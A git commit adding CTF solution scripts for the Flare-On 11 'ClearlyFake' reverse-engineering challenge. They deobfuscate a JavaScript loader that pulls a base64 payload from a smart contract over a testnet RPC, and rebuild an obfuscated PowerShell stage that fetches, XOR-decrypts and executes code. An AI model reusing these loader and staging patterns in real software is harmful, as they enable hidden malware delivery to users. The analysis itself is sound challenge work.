add flare-on writeup

src/FlareOn11/ClearlyFake/clearlyfake_analysed.js

@@ -0,0 +1,39 @@
+var v = [
+    '55206WoVBei', '17471OZVAdR', '62fJMBmo', 'replace', '120QkxHIP', '1147230VPiwgB', 'toString', '614324JhgXcW', '3dPcEIu', '120329NucVSe', 'split', 'fromCharCode', '2252288wlgQHe', 'const|web3||eth|fs|inputString|filePath|abi||targetAddress|contractAddress|error|string|data|decodedData|to|methodId|call|newEncodedData|callContractFunction|require|Web3|await||encodedData|largeString|result|new_methodId|decodeParameter|address|encodeParameters|slice|blockNumber|toString|function|writeFileSync|newData|base64|utf|from|Buffer|console|Error|catch|contract|try|0x5684cff5|new|BINANCE_TESTNET_RPC_URL|decoded|0x9223f0630c598a200f99c5d4746531d10319a569|async|0x5c880fcb|calling|base64DecodedData|KEY_CHECK_VALUE|Saved|log|43152014|decoded_output|txt', '10lbdBwM', '0\x20l=k(\x221\x22);0\x204=k(\x224\x22);0\x201=L\x20l(\x22M\x22);0\x20a=\x22O\x22;P\x20y\x20j(5){J{0\x20g=\x22K\x22;0\x20o=g+1.3.7.u([\x22c\x22],[5]).v(2);0\x20q=m\x201.3.h({f:a,d:o});0\x20p=1.3.7.s(\x22c\x22,q);0\x209=E.D(p,\x22B\x22).x(\x22C-8\x22);0\x206=\x22X.Y\x22;4.z(6,\x22$t\x20=\x20\x22+9+\x22\x5cn\x22);0\x20r=\x22Q\x22;0\x20w=W;0\x20i=r+1.3.7.u([\x22t\x22],[9]).v(2);0\x20A=m\x201.3.h({f:a,d:i},w);0\x20e=1.3.7.s(\x22c\x22,A);0\x20S=E.D(e,\x22B\x22).x(\x22C-8\x22);4.z(6,e);F.V(`U\x20N\x20d\x20f:${6}`)}H(b){F.b(\x22G\x20R\x20I\x20y:\x22,b)}}0\x205=\x22T\x22;j(5);', '3417255SrBbNs'
+];
+
+function f(a) {
+    return f = function (p) {
+        return v[p - 0xd6];
+    }, f(a);
+}
+
+(function () {
+    while (true) {
+        try {
+            var r = parseInt(f(0xe1)) / 0x1 * (parseInt(f(0xe2)) / 0x2) + -parseInt(f(0xd7)) / 0x3 * (parseInt(f(0xd6)) / 0x4) + parseInt(f(0xdd)) / 0x5 * (parseInt(f(0xe0)) / 0x6) + parseInt(f(0xe5)) / 0x7 + parseInt(f(0xdb)) / 0x8 + -parseInt(f(0xdf)) / 0x9 + -parseInt(f(0xe4)) / 0xa * (parseInt(f(0xd8)) / 0xb);
+            if (r === 0x53395) break;
+            else v.push(v.shift());
+        } catch (_0x1147b3) {
+            v.push(v.shift());
+        }
+    }
+}(), eval(function (f_0xde, _0x3d, x, f_0xdc_f_0xd9, g, obj) {
+    g = function (garg) {
+        return (garg < _0x3d ? '' : g(parseInt(garg / _0x3d))) + ((garg = garg % _0x3d) > 0x23 ? String[f(0xda)](garg + 0x1d) : garg[f(0xe6)](0x24));
+    };
+    if (!''['replace'](/^/, String)) {
+        while (x--) {
+            obj[g(x)] = f_0xdc_f_0xd9[x] || g(x);
+            console.log(obj);
+        }
+        f_0xdc_f_0xd9 = [function (t) {
+            return obj[t];
+        }], g = function () { return '\x5cw+'; }, x = 0x1;
+    };
+    while (x--) {
+        f_0xdc_f_0xd9[x] && (f_0xde = f_0xde[f(0xe3)](new RegExp('\x5cb' + g(x) + '\x5cb', 'g'), f_0xdc_f_0xd9[x]));
+    }
+    console.log(f_0xde);
+    // return f_0xde;
+}(f(0xde), 0x3d, 0x3d, f(0xdc)[f(0xd9)]('|'), 0x0, {})));

src/FlareOn11/ClearlyFake/clearlyfake_deobfuscated.js

@@ -0,0 +1,25 @@
+const Web3 = require("web3");
+const fs = require("fs");
+const web3 = new Web3("BINANCE_TESTNET_RPC_URL");
+const contractAddress = "0x9223f0630c598a200f99c5d4746531d10319a569";
+async function callContractFunction(inputString) {
+    try {
+        const methodId = "0x5684cff5";
+        const encodedData = methodId + web3.eth.abi.encodeParameters(["string"], [inputString]).slice(2);
+        const result = await web3.eth.call({ to: contractAddress, data: encodedData });
+        const largeString = web3.eth.abi.decodeParameter("string", result);
+        const targetAddress = Buffer.from(largeString, "base64").toString("utf-8");
+        const filePath = "decoded_output.txt";
+        fs.writeFileSync(filePath, "$address = " + targetAddress + "\n");
+        const new_methodId = "0x5c880fcb";
+        const blockNumber = 43152014;
+        const newEncodedData = new_methodId + web3.eth.abi.encodeParameters(["address"], [targetAddress]).slice(2);
+        const newData = await web3.eth.call({ to: contractAddress, data: newEncodedData }, blockNumber);
+        const decodedData = web3.eth.abi.decodeParameter("string", newData);
+        const base64DecodedData = Buffer.from(decodedData, "base64").toString("utf-8");
+        fs.writeFileSync(filePath, decodedData);
+        console.log(`Saved decoded data to:${filePath}`)
+    } catch (error) { console.error("Error calling contract function:", error) }
+}
+const inputString = "KEY_CHECK_VALUE";
+callContractFunction(inputString);

src/FlareOn11/ClearlyFake/decompress.py

@@ -0,0 +1,10 @@
+import base64
+import zlib
+
+base64_data = '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'
+
+compressed_data = base64.b64decode(base64_data)
+decompressed_data = zlib.decompress(compressed_data, wbits=-zlib.MAX_WBITS)
+text = decompressed_data.decode('ascii')
+
+print(text.encode())

src/FlareOn11/ClearlyFake/deobfuscate.py

@@ -0,0 +1,13 @@
+x = b"{39}{64}{57}{45}{70}{59}{9}{66}{0}{31}{21}{50}{6}{56}{5}{22}{69}{71}{43}{60}{8}{35}{68}{44}{1}{19}{41}{30}{67}{38}{18}{7}{33}{54}{63}{34}{61}{24}{48}{4}{47}{3}{40}{51}{26}{42}{15}{37}{12}{10}{11}{52}{14}{23}{29}{53}{25}{16}{49}{55}{62}{36}{27}{28}{13}{17}{46}{20}{2}{65}{58}{32}"
+y = b'\'CSAKoY+K\',\'xed\',\'P dKoY+KoYohteM- doKoY+KoYhteMtseR-ekovnI(( eulaV- pser emaN- elbairaV-teS\n)1aP}Iz70.2Iz7:Iz7cprnosjIzKoY+KoY7,1:Iz7diIz7,]KCOLB ,}Iz7bcf088c5x0Iz7:Iz7atadIz7,KoY+KoYIz7sserddaK6fIz7:Iz7otIz7KoY+KoY{[:Iz7smarapIz7,Iz7llac_hteIz7:Iz7d\',\'aBmorFsKoY+KoYetybK6f(gnirtSteKoY+KoYG.8FTU::]gniKoY+KoYdocnE.txeKoY+KoYT.metsyS[( KoY+KoYeulaV- KoY+KoYiicsAtluser emaN-KoY+KoY elbairaV-teS\n))2setybK6f(gniKoY+KoYrtS46esaBmorF::]trevnoC[( eulaV- 46esaBmorFsetyb ema\',\'tamroF #  _K6f f- 1aP}2X:0{1aP    \n{ tcejbO-hcaEroF sOI ii\',\'KoY+KoYab tlKoY+KoYuKoY+KoYser eht trevnoC #\n}\n ))]htgneL.setyByekK6f % iK6f[setyByekK6f roxb-\',\'teS\n)gnidocne IICSA gnimussa( gnirts\',\'KoY+KoYV-\',\'eT[( eulaV- 5setyb emaN- elbairaV-teS\n)}\n)61 ,)2 ,xednItratsK6f(gnirtsbuS.setyBxehK6f(etyBo\',\'c[((EcALPER.)93]RAHc[]GnIRTS[,)94]RAHc[+79]RAHc[+08]RAHc[((EcALPER.)63]RAHc[]GnIRTS[,)57]RAHc[+45]RAHc[+201]RAHc[((EcALPER.)KoY\ndnammocK6f noisserpxE-ekovnI\n)Iz7galfZjWZjW:C f- 1aPgaKoY+KoYlfZjWZjW:C > gnirtStlKoY+KoYuserK6KoY+KoYf ohce c/ dm\',\'N- \',\'elbai\',\'yb ema\',\')tl\',\'.rebmuNxehK6f(etyBoT::]trevnoC[  \',\'0setybK6f(gni\',\'Y+KoYcejbO-hcaEroFKoY+KoY sOI )1\',\'user.)ydob_K6f ydoB- Iz7nosj/noitacil\',\'usne( setyb ot xeh KoY+KoYmorf trevnoC #\n)Iz7Iz7 ,Iz7 Iz7 ecalper- setyBxehK6f(KoY+KoY eula\',\'nItrats em\',\'noKoY+KoYC- tniopdne_tentsetK6f irU- 1aPtsoP1a\',\'eT.metsyS[( eulaV- gnirtStluser emaN-\',\' ]iK6f[5setybK6f( + setyBtluserK6f( eulaV- \',\'KoY+KoY  \n)1 + xednKoY+KoYItratsK6f( eu\',\'eS\n)}\nsrettel esacrKoY+KoYeppu htiw xeh tigid-\',\' KoY+KoYtKo\',\'ulaV\',\'f( eulaV\',\'- rebmuNxeh emaN- elbairaV-teS\nxiferp 1aPx01aP eht evomeR KoY+KoY#\n\n\',\'laV- xednIdne KoY+KoYema\',\'F sOI )1 \',\'oY::]gnidocnE.tx\',\'eSKoY( G62,KoY.KoY ,KoYriGHTToLeftKoY) DF9%{X2j_ } )+G62 X2j(set-ITEM  KoYvArIAbLE:oFSKoY KoY KoY )G62) \',\' setyBxeh em\',\'etirW#\n )1aP 1aP KoY+KoYnioj- setyBxehK6f( eulaV- gnirtSxehKoY+KoY emaN- elbairaKoY+KoY\',\'T::]trevnoC[    \n)1 + xednItra\',\'alper- pserK6\',\'rtSteG.8FTU::]gnidocnE.txeT.metsyS[( eulaV- 1set\',\'elbairaV-tKoY+KoYeS\n)sretcarahc xeh fo sriap gnir\',\'. ( X2jEnV:coMspec[4,26,25]-jOInKoYKoY)(G62X2j(set-iTem KoYVAriABle:OfSKoY  KoYKoY )G62 + ( [STrinG][REGEx]:\',\'N- elbairaV-teS\nsety\',\'aN- elbairaV-teS    \n{ tcejbO-hcaEro\',\'- 2setyb emaN- eKoY+KoYlbairaV-teS\n))\',\' eht mrofreP \',\'ne emaN- elbairKoY+KoYaV-teS    \n)2 * _K6f( eulaV- \',\'-]2,11,3[EmAN.)KoY*rdm*KoY ElBAIrav((.DF9)421]RAHc[]GnIRTS[,KoYsOIKoY(EcALPER.)\',\'ppaIz7 epyTtnet\',\'csAtlKoY+KoYuserK6f( euKoY+KoYlaV- setyBxeh emaN- elbairaV-teS\n))46es\',\'owt sa etyb hcae \',\' - 2 / htgneL.rebmuNxehK6f(..0( eulaV- 0setyb emaN- elbairaV-teS\n)sretcarahc xeh fo sriap gnirusne(K\',\' elbairaV-\',\'b ot 46esab morf trevnoC #\n\n))881 ,46(gnirtsbuS.1setybK6f( e\',\'raV-teS\n )}\n)61 ,)2 ,xednItratsK6f(gnirtsbuS\',\'N- elbairaV-teS    \n)2 * _K6f( eulaV- xednItrats emaN- elbairaV-teS    \n{\',\'aN-\',\'oY+KoY setyb ot xeh morf trevnoC #\n)1aP1\',\' a ot kc\',\'YNIoJ\',\'aN- elbairaV-t\',\'cALPER.)KoYaVIKoY,)09]RAHc[+601]RAHc[+78]RAH\',\'#\n))Iz742NOERALFIz7(setyBteG.IICSA::]gnidocnE.txeT[( eulaV- setyByek emaN- elbairaV-teKoY+KoYS\nsetyb ot yek eht trevnoC #\n))3setybK6f(gnirtSteG.8FTU::]gnidocnE.tx\',\'V-t\',\'aP ,1aPx01aP ec\',\' elbairaV-teS\ngnirtSxKoY+KoYehK6f tuKoY+KoYptuO-\',\':MATCHeS(G62)KoYKo\',\'ohtemIz7{1aP( eulaV- ydob_ emaN- elbairaV-teS\n)Iz7 Iz7( eulaV-KoY+KoY tniKoY+KoYopdne_tentset em\',\'c1aP maKoY+KoYrgorp-sserpmoc-esu-- x- ratIzKoY+KoY7( eulaV-KoY+KoY dnammoc emaKoY+KoYN- elbairaV-teS\n\n))setyBtluserK6f(gnirtSteGKoY+KoY.II\',\'- 2 / htgneL.setyBxehK6f(..0( eulaV- 3setyb emaN- \',\'tsK6f( eulaV- xednId\',\'setyBtluser emaN- \',\'43]RAHc[]GnIRTS[,)37]RAHc[+221]RAHc[+55]RAHc[((E\',\'elbairaVKoY+KoY-teS    \n{ )++iK6f ;htgneL.5setybK6f tl- iK6f ;)0( eulaV- i emaN- elbairaV-teS( rof\n))(@( eulaV- setyBtluser emaN- KoY+KoYelbairaV-teS\nnoitarepo ROX\''
+ys = y.split(b'\',\'')
+
+for i in range(len(ys)):
+    assert b"{" + str(i).encode() + b"}" in x
+    x = x.replace(b'{' + str(i).encode() + b'}', ys[i])
+
+x = x.replace(b"DF9", b"|").replace(b"KoY", b"'").replace(b"G62", b'"').replace(b"X2j", b"$").replace(b"aVI", b"\\")
+x = bytes(reversed(list(x)))
+
+x = x.replace(bytes([102, 54, 75]), bytes([36])).replace(bytes([80, 97, 49]), bytes([39])).replace(bytes([87, 106, 90]), b"'").replace(bytes([55, 122, 73]), bytes([34])).replace(b"IOs", b"|")
+print(x.decode())

src/FlareOn11/ClearlyFake/solve.py

@@ -0,0 +1,48 @@
+import subprocess
+import base64
+import json
+from pwn import xor
+
+tx_hashes = [
+    "0xae4711c6e9d6d8f5d00a88e1adb35595bc7d7a73130e87356e3e71e65e17f337",
+    "0xdbf0e117fb3d4db0cd746835cfc4eb026612ac36a80f9f0f248dce061d90ae54",
+    "0x820549b2eb77e1078490eea9d2b819c219f0cfef921abaa6580d8cf628a8cd5f",
+    "0xef06996ee51d24cc6bfedcaa57bdc31e56975ec98d018f211b7db114fc94b573",
+    "0xb2405b84d625688c380a6ebf8e20526e9024b2b2b15700eb83437e2e19812ebe",
+    "0x05660d13d9d92bc1fc54fb44c738b7c9892841efc9df4b295e2b7fda79756c47",
+    "0x539ab8268334453b5f293948a89fe1b9a75aaa640571046416956c65bc611a79",
+    "0x6da2ad09ec61dfc9305d4f58cc2758a0dbe3429e7726cc2098a2ae425bc6c9ef",
+    "0xd086acbcedd08bf533457e627529a1206ad5e4461478ae2ce20be51659ac2734",
+    "0xd4c9d45de5f45f855d117938b2fb8bea1ac4691aaf43cb6fab5dcb5fcd47c278",
+    "0x88336b0a629fd096c5b8e031c603abd78f2fba0a0b09b3b03e1219098849fa73",
+    "0x096bc2f76176518f7f0ca267d1ac53e9bda8d49a3e4013f84d812dbd3cf479f8",
+    "0x5a6675770eff26562a47efa4e22bbf29d764351c13d8b1dce1f9c4f6a471d2f3",
+]
+
+for tx_hash in tx_hashes:
+    print(tx_hash)
+    cmd = f"cast tx {tx_hash} --json"
+    result = subprocess.check_output(cmd, shell=True).decode("utf-8")
+    tx_input = json.loads(result)["input"]
+    func_args = bytes.fromhex(tx_input[2:])[4:]
+    start_position = func_args[:0x20]
+    assert start_position == b"\x00" * 31 + b"\x20"
+    length = int(func_args[0x20:0x40].hex(), 16)
+    string_data = func_args[0x40 : 0x40 + length]
+    print(string_data)
+    KEY = b"FLAREON24"
+    try:
+        decoded = base64.b64decode(string_data)
+        print(decoded)
+        if b" " in decoded:
+            decoded = decoded.replace(b" ", b"")
+            decoded = bytes.fromhex(decoded.decode())
+            print(decoded)
+        if len(decoded) <= 1000:
+            decoded = xor(decoded, KEY)
+            print(decoded)
+    except Exception as e:
+        print(e)
+        decoded = xor(decoded, KEY)
+        print(decoded)
+    print()